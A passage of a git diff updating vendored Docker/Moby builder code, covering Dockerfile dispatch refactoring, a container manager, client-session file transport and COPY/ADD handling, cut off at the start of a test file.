-General support can be found at the following locations: +General support for **docker** can be found at the following locations: - Docker Support Forums - https://forums.docker.com -- IRC - irc.freenode.net #docker channel +- Slack - community.docker.com #general channel - Post a question on StackOverflow, using the Docker tag +General support for **moby** can be found at the following locations: + +- Moby Project Forums - https://forums.mobyproject.org +- Slack - community.docker.com #moby-project channel +- Post a question on StackOverflow, using the Moby tag + --------------------------------------------------- BUG REPORT INFORMATION --------------------------------------------------- diff --git a/vendor/github.com/docker/docker/.github/PULL_REQUEST_TEMPLATE.md b/vendor/github.com/docker/docker/.github/PULL_REQUEST_TEMPLATE.md index 426981828b..fad7555d77 100644 --- a/vendor/github.com/docker/docker/.github/PULL_REQUEST_TEMPLATE.md +++ b/vendor/github.com/docker/docker/.github/PULL_REQUEST_TEMPLATE.md @@ -1,6 +1,6 @@ %s\n", shortImgID) - if b.options.Remove { - b.clearTmp() - } + dockerfile.PrintWarnings(b.Stderr) + dispatchState, err := b.dispatchDockerfileWithCancellation(stages, metaArgs, dockerfile.EscapeToken, source) + if err != nil { + return nil, err + } + if dispatchState.imageID == "" { + buildsFailed.WithValues(metricsDockerfileEmptyError).Inc() + return nil, errors.New("No image was generated. Is your Dockerfile empty?") } + return &builder.Result{ImageID: dispatchState.imageID, FromImage: dispatchState.baseImage}, nil +} - // check if there are any leftover build-args that were passed but not - // consumed during build. Return a warning, if there are any. 
- leftoverArgs := []string{} - for arg := range b.options.BuildArgs { - if !b.isBuildArgAllowed(arg) { - leftoverArgs = append(leftoverArgs, arg) - } +func emitImageID(aux *streamformatter.AuxFormatter, state *dispatchState) error { + if aux == nil || state.imageID == "" { + return nil } + return aux.Emit(types.BuildResult{ID: state.imageID}) +} - if len(leftoverArgs) > 0 { - fmt.Fprintf(b.Stderr, "[Warning] One or more build-args %v were not consumed\n", leftoverArgs) +func processMetaArg(meta instructions.ArgCommand, shlex *shell.Lex, args *BuildArgs) error { + // shell.Lex currently only support the concatenated string format + envs := convertMapToEnvList(args.GetAllAllowed()) + if err := meta.Expand(func(word string) (string, error) { + return shlex.ProcessWord(word, envs) + }); err != nil { + return err } + args.AddArg(meta.Key, meta.Value) + args.AddMetaArg(meta.Key, meta.Value) + return nil +} - if b.image == "" { - return "", fmt.Errorf("No image was generated. Is your Dockerfile empty?") +func printCommand(out io.Writer, currentCommandIndex int, totalCommands int, cmd interface{}) int { + fmt.Fprintf(out, stepFormat, currentCommandIndex, totalCommands, cmd) + fmt.Fprintln(out) + return currentCommandIndex + 1 +} + +func (b *Builder) dispatchDockerfileWithCancellation(parseResult []instructions.Stage, metaArgs []instructions.ArgCommand, escapeToken rune, source builder.Source) (*dispatchState, error) { + dispatchRequest := dispatchRequest{} + buildArgs := NewBuildArgs(b.options.BuildArgs) + totalCommands := len(metaArgs) + len(parseResult) + currentCommandIndex := 1 + for _, stage := range parseResult { + totalCommands += len(stage.Commands) } + shlex := shell.NewLex(escapeToken) + for _, meta := range metaArgs { + currentCommandIndex = printCommand(b.Stdout, currentCommandIndex, totalCommands, &meta) - if b.options.Squash { - var fromID string - if b.from != nil { - fromID = b.from.ImageID() - } - b.image, err = b.docker.SquashImage(b.image, fromID) + err 
:= processMetaArg(meta, shlex, buildArgs) if err != nil { - return "", perrors.Wrap(err, "error squashing image") + return nil, err } } - imageID := image.ID(b.image) - for _, rt := range repoAndTags { - if err := b.docker.TagImageWithReference(imageID, rt); err != nil { - return "", err + stagesResults := newStagesBuildResults() + + for _, stage := range parseResult { + if err := stagesResults.checkStageNameAvailable(stage.Name); err != nil { + return nil, err } - } + dispatchRequest = newDispatchRequest(b, escapeToken, source, buildArgs, stagesResults) - fmt.Fprintf(b.Stdout, "Successfully built %s\n", shortImgID) - return b.image, nil -} + currentCommandIndex = printCommand(b.Stdout, currentCommandIndex, totalCommands, stage.SourceCode) + if err := initializeStage(dispatchRequest, &stage); err != nil { + return nil, err + } + dispatchRequest.state.updateRunConfig() + fmt.Fprintf(b.Stdout, " ---> %s\n", stringid.TruncateID(dispatchRequest.state.imageID)) + for _, cmd := range stage.Commands { + select { + case <-b.clientCtx.Done(): + logrus.Debug("Builder: build cancelled!") + fmt.Fprint(b.Stdout, "Build cancelled\n") + buildsFailed.WithValues(metricsBuildCanceled).Inc() + return nil, errors.New("Build cancelled") + default: + // Not cancelled yet, keep going... + } -// Cancel cancels an ongoing Dockerfile build. 
-func (b *Builder) Cancel() { - b.cancel() + currentCommandIndex = printCommand(b.Stdout, currentCommandIndex, totalCommands, cmd) + + if err := dispatch(dispatchRequest, cmd); err != nil { + return nil, err + } + dispatchRequest.state.updateRunConfig() + fmt.Fprintf(b.Stdout, " ---> %s\n", stringid.TruncateID(dispatchRequest.state.imageID)) + + } + if err := emitImageID(b.Aux, dispatchRequest.state); err != nil { + return nil, err + } + buildArgs.MergeReferencedArgs(dispatchRequest.state.buildArgs) + if err := commitStage(dispatchRequest.state, stagesResults); err != nil { + return nil, err + } + } + buildArgs.WarnOnUnusedBuildArgs(b.Stdout) + return dispatchRequest.state, nil } // BuildFromConfig builds directly from `changes`, treating it as if it were the contents of a Dockerfile @@ -330,41 +359,63 @@ func (b *Builder) Cancel() { // coming from the query parameter of the same name. // // TODO: Remove? -func BuildFromConfig(config *container.Config, changes []string) (*container.Config, error) { - b, err := NewBuilder(context.Background(), nil, nil, nil, nil) - if err != nil { - return nil, err +func BuildFromConfig(config *container.Config, changes []string, os string) (*container.Config, error) { + if !system.IsOSSupported(os) { + return nil, errdefs.InvalidParameter(system.ErrNotSupportedOperatingSystem) + } + if len(changes) == 0 { + return config, nil } - ast, err := parser.Parse(bytes.NewBufferString(strings.Join(changes, "\n")), &b.directive) + dockerfile, err := parser.Parse(bytes.NewBufferString(strings.Join(changes, "\n"))) if err != nil { - return nil, err + return nil, errdefs.InvalidParameter(err) } + b := newBuilder(context.Background(), builderOptions{ + Options: &types.ImageBuildOptions{NoCache: true}, + }) + // ensure that the commands are valid - for _, n := range ast.Children { + for _, n := range dockerfile.AST.Children { if !validCommitCommands[n.Value] { - return nil, fmt.Errorf("%s is not a valid change command", n.Value) + return nil, 
errdefs.InvalidParameter(errors.Errorf("%s is not a valid change command", n.Value)) } } - b.runConfig = config b.Stdout = ioutil.Discard b.Stderr = ioutil.Discard b.disableCommit = true - total := len(ast.Children) - for _, n := range ast.Children { - if err := b.checkDispatch(n, false); err != nil { - return nil, err + var commands []instructions.Command + for _, n := range dockerfile.AST.Children { + cmd, err := instructions.ParseCommand(n) + if err != nil { + return nil, errdefs.InvalidParameter(err) } + commands = append(commands, cmd) } - for i, n := range ast.Children { - if err := b.dispatch(i, total, n); err != nil { - return nil, err + dispatchRequest := newDispatchRequest(b, dockerfile.EscapeToken, nil, NewBuildArgs(b.options.BuildArgs), newStagesBuildResults()) + // We make mutations to the configuration, ensure we have a copy + dispatchRequest.state.runConfig = copyRunConfig(config) + dispatchRequest.state.imageID = config.Image + dispatchRequest.state.operatingSystem = os + for _, cmd := range commands { + err := dispatch(dispatchRequest, cmd) + if err != nil { + return nil, errdefs.InvalidParameter(err) } + dispatchRequest.state.updateRunConfig() } - return b.runConfig, nil + return dispatchRequest.state.runConfig, nil +} + +func convertMapToEnvList(m map[string]string) []string { + result := []string{} + for k, v := range m { + result = append(result, k+"="+v) + } + return result } diff --git a/vendor/github.com/docker/docker/builder/dockerfile/builder_unix.go b/vendor/github.com/docker/docker/builder/dockerfile/builder_unix.go index 76a7ce74f9..c4453459b3 100644 --- a/vendor/github.com/docker/docker/builder/dockerfile/builder_unix.go +++ b/vendor/github.com/docker/docker/builder/dockerfile/builder_unix.go @@ -1,5 +1,7 @@ // +build !windows -package dockerfile +package dockerfile // import "github.com/docker/docker/builder/dockerfile" -var defaultShell = []string{"/bin/sh", "-c"} +func defaultShellForOS(os string) []string { + return 
[]string{"/bin/sh", "-c"} +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/builder_windows.go b/vendor/github.com/docker/docker/builder/dockerfile/builder_windows.go index 37e9fbcf4b..fbafa52aec 100644 --- a/vendor/github.com/docker/docker/builder/dockerfile/builder_windows.go +++ b/vendor/github.com/docker/docker/builder/dockerfile/builder_windows.go @@ -1,3 +1,8 @@ -package dockerfile +package dockerfile // import "github.com/docker/docker/builder/dockerfile" -var defaultShell = []string{"cmd", "/S", "/C"} +func defaultShellForOS(os string) []string { + if os == "linux" { + return []string{"/bin/sh", "-c"} + } + return []string{"cmd", "/S", "/C"} +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/clientsession.go b/vendor/github.com/docker/docker/builder/dockerfile/clientsession.go new file mode 100644 index 0000000000..b48090d7b5 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/clientsession.go @@ -0,0 +1,76 @@ +package dockerfile // import "github.com/docker/docker/builder/dockerfile" + +import ( + "context" + "time" + + "github.com/docker/docker/builder/fscache" + "github.com/docker/docker/builder/remotecontext" + "github.com/moby/buildkit/session" + "github.com/moby/buildkit/session/filesync" + "github.com/pkg/errors" +) + +const sessionConnectTimeout = 5 * time.Second + +// ClientSessionTransport is a transport for copying files from docker client +// to the daemon. +type ClientSessionTransport struct{} + +// NewClientSessionTransport returns new ClientSessionTransport instance +func NewClientSessionTransport() *ClientSessionTransport { + return &ClientSessionTransport{} +} + +// Copy data from a remote to a destination directory. 
+func (cst *ClientSessionTransport) Copy(ctx context.Context, id fscache.RemoteIdentifier, dest string, cu filesync.CacheUpdater) error { + csi, ok := id.(*ClientSessionSourceIdentifier) + if !ok { + return errors.New("invalid identifier for client session") + } + + return filesync.FSSync(ctx, csi.caller, filesync.FSSendRequestOpt{ + IncludePatterns: csi.includePatterns, + DestDir: dest, + CacheUpdater: cu, + }) +} + +// ClientSessionSourceIdentifier is an identifier that can be used for requesting +// files from remote client +type ClientSessionSourceIdentifier struct { + includePatterns []string + caller session.Caller + uuid string +} + +// NewClientSessionSourceIdentifier returns new ClientSessionSourceIdentifier instance +func NewClientSessionSourceIdentifier(ctx context.Context, sg SessionGetter, uuid string) (*ClientSessionSourceIdentifier, error) { + csi := &ClientSessionSourceIdentifier{ + uuid: uuid, + } + caller, err := sg.Get(ctx, uuid) + if err != nil { + return nil, errors.Wrapf(err, "failed to get session for %s", uuid) + } + + csi.caller = caller + return csi, nil +} + +// Transport returns transport identifier for remote identifier +func (csi *ClientSessionSourceIdentifier) Transport() string { + return remotecontext.ClientSessionRemote +} + +// SharedKey returns shared key for remote identifier. Shared key is used +// for finding the base for a repeated transfer. +func (csi *ClientSessionSourceIdentifier) SharedKey() string { + return csi.caller.SharedKey() +} + +// Key returns unique key for remote identifier. Requests with same key return +// same data. 
+func (csi *ClientSessionSourceIdentifier) Key() string { + return csi.uuid +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/command/command.go b/vendor/github.com/docker/docker/builder/dockerfile/command/command.go deleted file mode 100644 index f23c6874b5..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/command/command.go +++ /dev/null @@ -1,46 +0,0 @@ -// Package command contains the set of Dockerfile commands. -package command - -// Define constants for the command strings -const ( - Add = "add" - Arg = "arg" - Cmd = "cmd" - Copy = "copy" - Entrypoint = "entrypoint" - Env = "env" - Expose = "expose" - From = "from" - Healthcheck = "healthcheck" - Label = "label" - Maintainer = "maintainer" - Onbuild = "onbuild" - Run = "run" - Shell = "shell" - StopSignal = "stopsignal" - User = "user" - Volume = "volume" - Workdir = "workdir" -) - -// Commands is list of all Dockerfile commands -var Commands = map[string]struct{}{ - Add: {}, - Arg: {}, - Cmd: {}, - Copy: {}, - Entrypoint: {}, - Env: {}, - Expose: {}, - From: {}, - Healthcheck: {}, - Label: {}, - Maintainer: {}, - Onbuild: {}, - Run: {}, - Shell: {}, - StopSignal: {}, - User: {}, - Volume: {}, - Workdir: {}, -} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/containerbackend.go b/vendor/github.com/docker/docker/builder/dockerfile/containerbackend.go new file mode 100644 index 0000000000..54adfb13f7 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/containerbackend.go @@ -0,0 +1,146 @@ +package dockerfile // import "github.com/docker/docker/builder/dockerfile" + +import ( + "context" + "fmt" + "io" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/builder" + containerpkg "github.com/docker/docker/container" + "github.com/docker/docker/pkg/stringid" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" +) + +type containerManager struct { + tmpContainers 
map[string]struct{} + backend builder.ExecBackend +} + +// newContainerManager creates a new container backend +func newContainerManager(docker builder.ExecBackend) *containerManager { + return &containerManager{ + backend: docker, + tmpContainers: make(map[string]struct{}), + } +} + +// Create a container +func (c *containerManager) Create(runConfig *container.Config, hostConfig *container.HostConfig) (container.ContainerCreateCreatedBody, error) { + container, err := c.backend.ContainerCreate(types.ContainerCreateConfig{ + Config: runConfig, + HostConfig: hostConfig, + }) + if err != nil { + return container, err + } + c.tmpContainers[container.ID] = struct{}{} + return container, nil +} + +var errCancelled = errors.New("build cancelled") + +// Run a container by ID +func (c *containerManager) Run(ctx context.Context, cID string, stdout, stderr io.Writer) (err error) { + attached := make(chan struct{}) + errCh := make(chan error) + go func() { + errCh <- c.backend.ContainerAttachRaw(cID, nil, stdout, stderr, true, attached) + }() + select { + case err := <-errCh: + return err + case <-attached: + } + + finished := make(chan struct{}) + cancelErrCh := make(chan error, 1) + go func() { + select { + case <-ctx.Done(): + logrus.Debugln("Build cancelled, killing and removing container:", cID) + c.backend.ContainerKill(cID, 0) + c.removeContainer(cID, stdout) + cancelErrCh <- errCancelled + case <-finished: + cancelErrCh <- nil + } + }() + + if err := c.backend.ContainerStart(cID, nil, "", ""); err != nil { + close(finished) + logCancellationError(cancelErrCh, "error from ContainerStart: "+err.Error()) + return err + } + + // Block on reading output from container, stop on err or chan closed + if err := <-errCh; err != nil { + close(finished) + logCancellationError(cancelErrCh, "error from errCh: "+err.Error()) + return err + } + + waitC, err := c.backend.ContainerWait(ctx, cID, containerpkg.WaitConditionNotRunning) + if err != nil { + close(finished) + 
logCancellationError(cancelErrCh, fmt.Sprintf("unable to begin ContainerWait: %s", err)) + return err + } + + if status := <-waitC; status.ExitCode() != 0 { + close(finished) + logCancellationError(cancelErrCh, + fmt.Sprintf("a non-zero code from ContainerWait: %d", status.ExitCode())) + return &statusCodeError{code: status.ExitCode(), err: status.Err()} + } + + close(finished) + return <-cancelErrCh +} + +func logCancellationError(cancelErrCh chan error, msg string) { + if cancelErr := <-cancelErrCh; cancelErr != nil { + logrus.Debugf("Build cancelled (%v): %s", cancelErr, msg) + } +} + +type statusCodeError struct { + code int + err error +} + +func (e *statusCodeError) Error() string { + if e.err == nil { + return "" + } + return e.err.Error() +} + +func (e *statusCodeError) StatusCode() int { + return e.code +} + +func (c *containerManager) removeContainer(containerID string, stdout io.Writer) error { + rmConfig := &types.ContainerRmConfig{ + ForceRemove: true, + RemoveVolume: true, + } + if err := c.backend.ContainerRm(containerID, rmConfig); err != nil { + fmt.Fprintf(stdout, "Error removing intermediate container %s: %v\n", stringid.TruncateID(containerID), err) + return err + } + return nil +} + +// RemoveAll containers managed by this container manager +func (c *containerManager) RemoveAll(stdout io.Writer) { + for containerID := range c.tmpContainers { + if err := c.removeContainer(containerID, stdout); err != nil { + return + } + delete(c.tmpContainers, containerID) + fmt.Fprintf(stdout, "Removing intermediate container %s\n", stringid.TruncateID(containerID)) + } +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/copy.go b/vendor/github.com/docker/docker/builder/dockerfile/copy.go new file mode 100644 index 0000000000..43f40b62f9 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/copy.go @@ -0,0 +1,560 @@ +package dockerfile // import "github.com/docker/docker/builder/dockerfile" + +import ( + "archive/tar" + "fmt" + 
"io" + "mime" + "net/http" + "net/url" + "os" + "path/filepath" + "runtime" + "sort" + "strings" + "time" + + "github.com/docker/docker/builder" + "github.com/docker/docker/builder/remotecontext" + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/containerfs" + "github.com/docker/docker/pkg/idtools" + "github.com/docker/docker/pkg/ioutils" + "github.com/docker/docker/pkg/progress" + "github.com/docker/docker/pkg/streamformatter" + "github.com/docker/docker/pkg/system" + "github.com/docker/docker/pkg/urlutil" + "github.com/pkg/errors" +) + +const unnamedFilename = "__unnamed__" + +type pathCache interface { + Load(key interface{}) (value interface{}, ok bool) + Store(key, value interface{}) +} + +// copyInfo is a data object which stores the metadata about each source file in +// a copyInstruction +type copyInfo struct { + root containerfs.ContainerFS + path string + hash string + noDecompress bool +} + +func (c copyInfo) fullPath() (string, error) { + return c.root.ResolveScopedPath(c.path, true) +} + +func newCopyInfoFromSource(source builder.Source, path string, hash string) copyInfo { + return copyInfo{root: source.Root(), path: path, hash: hash} +} + +func newCopyInfos(copyInfos ...copyInfo) []copyInfo { + return copyInfos +} + +// copyInstruction is a fully parsed COPY or ADD command that is passed to +// Builder.performCopy to copy files into the image filesystem +type copyInstruction struct { + cmdName string + infos []copyInfo + dest string + chownStr string + allowLocalDecompression bool +} + +// copier reads a raw COPY or ADD command, fetches remote sources using a downloader, +// and creates a copyInstruction +type copier struct { + imageSource *imageMount + source builder.Source + pathCache pathCache + download sourceDownloader + platform string + // for cleanup. TODO: having copier.cleanup() is error prone and hard to + // follow. Code calling performCopy should manage the lifecycle of its params. 
+ // Copier should take override source as input, not imageMount. + activeLayer builder.RWLayer + tmpPaths []string +} + +func copierFromDispatchRequest(req dispatchRequest, download sourceDownloader, imageSource *imageMount) copier { + return copier{ + source: req.source, + pathCache: req.builder.pathCache, + download: download, + imageSource: imageSource, + platform: req.builder.options.Platform, + } +} + +func (o *copier) createCopyInstruction(args []string, cmdName string) (copyInstruction, error) { + inst := copyInstruction{cmdName: cmdName} + last := len(args) - 1 + + // Work in platform-specific filepath semantics + inst.dest = fromSlash(args[last], o.platform) + separator := string(separator(o.platform)) + infos, err := o.getCopyInfosForSourcePaths(args[0:last], inst.dest) + if err != nil { + return inst, errors.Wrapf(err, "%s failed", cmdName) + } + if len(infos) > 1 && !strings.HasSuffix(inst.dest, separator) { + return inst, errors.Errorf("When using %s with more than one source file, the destination must be a directory and end with a /", cmdName) + } + inst.infos = infos + return inst, nil +} + +// getCopyInfosForSourcePaths iterates over the source files and calculate the info +// needed to copy (e.g. hash value if cached) +// The dest is used in case source is URL (and ends with "/") +func (o *copier) getCopyInfosForSourcePaths(sources []string, dest string) ([]copyInfo, error) { + var infos []copyInfo + for _, orig := range sources { + subinfos, err := o.getCopyInfoForSourcePath(orig, dest) + if err != nil { + return nil, err + } + infos = append(infos, subinfos...) 
+ } + + if len(infos) == 0 { + return nil, errors.New("no source files were specified") + } + return infos, nil +} + +func (o *copier) getCopyInfoForSourcePath(orig, dest string) ([]copyInfo, error) { + if !urlutil.IsURL(orig) { + return o.calcCopyInfo(orig, true) + } + + remote, path, err := o.download(orig) + if err != nil { + return nil, err + } + // If path == "" then we are unable to determine filename from src + // We have to make sure dest is available + if path == "" { + if strings.HasSuffix(dest, "/") { + return nil, errors.Errorf("cannot determine filename for source %s", orig) + } + path = unnamedFilename + } + o.tmpPaths = append(o.tmpPaths, remote.Root().Path()) + + hash, err := remote.Hash(path) + ci := newCopyInfoFromSource(remote, path, hash) + ci.noDecompress = true // data from http shouldn't be extracted even on ADD + return newCopyInfos(ci), err +} + +// Cleanup removes any temporary directories created as part of downloading +// remote files. +func (o *copier) Cleanup() { + for _, path := range o.tmpPaths { + os.RemoveAll(path) + } + o.tmpPaths = []string{} + if o.activeLayer != nil { + o.activeLayer.Release() + o.activeLayer = nil + } +} + +// TODO: allowWildcards can probably be removed by refactoring this function further. +func (o *copier) calcCopyInfo(origPath string, allowWildcards bool) ([]copyInfo, error) { + imageSource := o.imageSource + + // TODO: do this when creating copier. Requires validateCopySourcePath + // (and other below) to be aware of the difference sources. Why is it only + // done on image Source? 
+ if imageSource != nil && o.activeLayer == nil { + // this needs to be protected against repeated calls as wildcard copy + // will call it multiple times for a single COPY + var err error + rwLayer, err := imageSource.NewRWLayer() + if err != nil { + return nil, err + } + o.activeLayer = rwLayer + + o.source, err = remotecontext.NewLazySource(rwLayer.Root()) + if err != nil { + return nil, errors.Wrapf(err, "failed to create context for copy from %s", rwLayer.Root().Path()) + } + } + + if o.source == nil { + return nil, errors.Errorf("missing build context") + } + + root := o.source.Root() + + if err := validateCopySourcePath(imageSource, origPath, root.OS()); err != nil { + return nil, err + } + + // Work in source OS specific filepath semantics + // For LCOW, this is NOT the daemon OS. + origPath = root.FromSlash(origPath) + origPath = strings.TrimPrefix(origPath, string(root.Separator())) + origPath = strings.TrimPrefix(origPath, "."+string(root.Separator())) + + // Deal with wildcards + if allowWildcards && containsWildcards(origPath, root.OS()) { + return o.copyWithWildcards(origPath) + } + + if imageSource != nil && imageSource.ImageID() != "" { + // return a cached copy if one exists + if h, ok := o.pathCache.Load(imageSource.ImageID() + origPath); ok { + return newCopyInfos(newCopyInfoFromSource(o.source, origPath, h.(string))), nil + } + } + + // Deal with the single file case + copyInfo, err := copyInfoForFile(o.source, origPath) + switch { + case err != nil: + return nil, err + case copyInfo.hash != "": + o.storeInPathCache(imageSource, origPath, copyInfo.hash) + return newCopyInfos(copyInfo), err + } + + // TODO: remove, handle dirs in Hash() + subfiles, err := walkSource(o.source, origPath) + if err != nil { + return nil, err + } + + hash := hashStringSlice("dir", subfiles) + o.storeInPathCache(imageSource, origPath, hash) + return newCopyInfos(newCopyInfoFromSource(o.source, origPath, hash)), nil +} + +func containsWildcards(name, platform string) 
bool { + isWindows := platform == "windows" + for i := 0; i < len(name); i++ { + ch := name[i] + if ch == '\\' && !isWindows { + i++ + } else if ch == '*' || ch == '?' || ch == '[' { + return true + } + } + return false +} + +func (o *copier) storeInPathCache(im *imageMount, path string, hash string) { + if im != nil { + o.pathCache.Store(im.ImageID()+path, hash) + } +} + +func (o *copier) copyWithWildcards(origPath string) ([]copyInfo, error) { + root := o.source.Root() + var copyInfos []copyInfo + if err := root.Walk(root.Path(), func(path string, info os.FileInfo, err error) error { + if err != nil { + return err + } + rel, err := remotecontext.Rel(root, path) + if err != nil { + return err + } + + if rel == "." { + return nil + } + if match, _ := root.Match(origPath, rel); !match { + return nil + } + + // Note we set allowWildcards to false in case the name has + // a * in it + subInfos, err := o.calcCopyInfo(rel, false) + if err != nil { + return err + } + copyInfos = append(copyInfos, subInfos...) + return nil + }); err != nil { + return nil, err + } + return copyInfos, nil +} + +func copyInfoForFile(source builder.Source, path string) (copyInfo, error) { + fi, err := remotecontext.StatAt(source, path) + if err != nil { + return copyInfo{}, err + } + + if fi.IsDir() { + return copyInfo{}, nil + } + hash, err := source.Hash(path) + if err != nil { + return copyInfo{}, err + } + return newCopyInfoFromSource(source, path, "file:"+hash), nil +} + +// TODO: dedupe with copyWithWildcards() +func walkSource(source builder.Source, origPath string) ([]string, error) { + fp, err := remotecontext.FullPath(source, origPath) + if err != nil { + return nil, err + } + // Must be a dir + var subfiles []string + err = source.Root().Walk(fp, func(path string, info os.FileInfo, err error) error { + if err != nil { + return err + } + rel, err := remotecontext.Rel(source.Root(), path) + if err != nil { + return err + } + if rel == "." 
{ + return nil + } + hash, err := source.Hash(rel) + if err != nil { + return nil + } + // we already checked handleHash above + subfiles = append(subfiles, hash) + return nil + }) + if err != nil { + return nil, err + } + + sort.Strings(subfiles) + return subfiles, nil +} + +type sourceDownloader func(string) (builder.Source, string, error) + +func newRemoteSourceDownloader(output, stdout io.Writer) sourceDownloader { + return func(url string) (builder.Source, string, error) { + return downloadSource(output, stdout, url) + } +} + +func errOnSourceDownload(_ string) (builder.Source, string, error) { + return nil, "", errors.New("source can't be a URL for COPY") +} + +func getFilenameForDownload(path string, resp *http.Response) string { + // Guess filename based on source + if path != "" && !strings.HasSuffix(path, "/") { + if filename := filepath.Base(filepath.FromSlash(path)); filename != "" { + return filename + } + } + + // Guess filename based on Content-Disposition + if contentDisposition := resp.Header.Get("Content-Disposition"); contentDisposition != "" { + if _, params, err := mime.ParseMediaType(contentDisposition); err == nil { + if params["filename"] != "" && !strings.HasSuffix(params["filename"], "/") { + if filename := filepath.Base(filepath.FromSlash(params["filename"])); filename != "" { + return filename + } + } + } + } + return "" +} + +func downloadSource(output io.Writer, stdout io.Writer, srcURL string) (remote builder.Source, p string, err error) { + u, err := url.Parse(srcURL) + if err != nil { + return + } + + resp, err := remotecontext.GetWithStatusError(srcURL) + if err != nil { + return + } + + filename := getFilenameForDownload(u.Path, resp) + + // Prepare file in a tmp dir + tmpDir, err := ioutils.TempDir("", "docker-remote") + if err != nil { + return + } + defer func() { + if err != nil { + os.RemoveAll(tmpDir) + } + }() + // If filename is empty, the returned filename will be "" but + // the tmp filename will be created as 
"__unnamed__" + tmpFileName := filename + if filename == "" { + tmpFileName = unnamedFilename + } + tmpFileName = filepath.Join(tmpDir, tmpFileName) + tmpFile, err := os.OpenFile(tmpFileName, os.O_RDWR|os.O_CREATE|os.O_EXCL, 0600) + if err != nil { + return + } + + progressOutput := streamformatter.NewJSONProgressOutput(output, true) + progressReader := progress.NewProgressReader(resp.Body, progressOutput, resp.ContentLength, "", "Downloading") + // Download and dump result to tmp file + // TODO: add filehash directly + if _, err = io.Copy(tmpFile, progressReader); err != nil { + tmpFile.Close() + return + } + // TODO: how important is this random blank line to the output? + fmt.Fprintln(stdout) + + // Set the mtime to the Last-Modified header value if present + // Otherwise just remove atime and mtime + mTime := time.Time{} + + lastMod := resp.Header.Get("Last-Modified") + if lastMod != "" { + // If we can't parse it then just let it default to 'zero' + // otherwise use the parsed time value + if parsedMTime, err := http.ParseTime(lastMod); err == nil { + mTime = parsedMTime + } + } + + tmpFile.Close() + + if err = system.Chtimes(tmpFileName, mTime, mTime); err != nil { + return + } + + lc, err := remotecontext.NewLazySource(containerfs.NewLocalContainerFS(tmpDir)) + return lc, filename, err +} + +type copyFileOptions struct { + decompress bool + chownPair idtools.IDPair + archiver Archiver +} + +type copyEndpoint struct { + driver containerfs.Driver + path string +} + +func performCopyForInfo(dest copyInfo, source copyInfo, options copyFileOptions) error { + srcPath, err := source.fullPath() + if err != nil { + return err + } + + destPath, err := dest.fullPath() + if err != nil { + return err + } + + archiver := options.archiver + + srcEndpoint := ©Endpoint{driver: source.root, path: srcPath} + destEndpoint := ©Endpoint{driver: dest.root, path: destPath} + + src, err := source.root.Stat(srcPath) + if err != nil { + return errors.Wrapf(err, "source path not 
found") + } + if src.IsDir() { + return copyDirectory(archiver, srcEndpoint, destEndpoint, options.chownPair) + } + if options.decompress && isArchivePath(source.root, srcPath) && !source.noDecompress { + return archiver.UntarPath(srcPath, destPath) + } + + destExistsAsDir, err := isExistingDirectory(destEndpoint) + if err != nil { + return err + } + // dest.path must be used because destPath has already been cleaned of any + // trailing slash + if endsInSlash(dest.root, dest.path) || destExistsAsDir { + // source.path must be used to get the correct filename when the source + // is a symlink + destPath = dest.root.Join(destPath, source.root.Base(source.path)) + destEndpoint = ©Endpoint{driver: dest.root, path: destPath} + } + return copyFile(archiver, srcEndpoint, destEndpoint, options.chownPair) +} + +func isArchivePath(driver containerfs.ContainerFS, path string) bool { + file, err := driver.Open(path) + if err != nil { + return false + } + defer file.Close() + rdr, err := archive.DecompressStream(file) + if err != nil { + return false + } + r := tar.NewReader(rdr) + _, err = r.Next() + return err == nil +} + +func copyDirectory(archiver Archiver, source, dest *copyEndpoint, chownPair idtools.IDPair) error { + destExists, err := isExistingDirectory(dest) + if err != nil { + return errors.Wrapf(err, "failed to query destination path") + } + + if err := archiver.CopyWithTar(source.path, dest.path); err != nil { + return errors.Wrapf(err, "failed to copy directory") + } + // TODO: @gupta-ak. Investigate how LCOW permission mappings will work. 
+ return fixPermissions(source.path, dest.path, chownPair, !destExists) +} + +func copyFile(archiver Archiver, source, dest *copyEndpoint, chownPair idtools.IDPair) error { + if runtime.GOOS == "windows" && dest.driver.OS() == "linux" { + // LCOW + if err := dest.driver.MkdirAll(dest.driver.Dir(dest.path), 0755); err != nil { + return errors.Wrapf(err, "failed to create new directory") + } + } else { + if err := idtools.MkdirAllAndChownNew(filepath.Dir(dest.path), 0755, chownPair); err != nil { + // Normal containers + return errors.Wrapf(err, "failed to create new directory") + } + } + + if err := archiver.CopyFileWithTar(source.path, dest.path); err != nil { + return errors.Wrapf(err, "failed to copy file") + } + // TODO: @gupta-ak. Investigate how LCOW permission mappings will work. + return fixPermissions(source.path, dest.path, chownPair, false) +} + +func endsInSlash(driver containerfs.Driver, path string) bool { + return strings.HasSuffix(path, string(driver.Separator())) +} + +// isExistingDirectory returns true if the path exists and is a directory +func isExistingDirectory(point *copyEndpoint) (bool, error) { + destStat, err := point.driver.Stat(point.path) + switch { + case os.IsNotExist(err): + return false, nil + case err != nil: + return false, err + } + return destStat.IsDir(), nil +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/copy_test.go b/vendor/github.com/docker/docker/builder/dockerfile/copy_test.go new file mode 100644 index 0000000000..f559ff4fd8 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/copy_test.go @@ -0,0 +1,148 @@ +package dockerfile // import "github.com/docker/docker/builder/dockerfile" + +import ( + "net/http" + "testing" + + "github.com/docker/docker/pkg/containerfs" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/fs" +) + +func TestIsExistingDirectory(t *testing.T) { + tmpfile := fs.NewFile(t, "file-exists-test", fs.WithContent("something")) + defer 
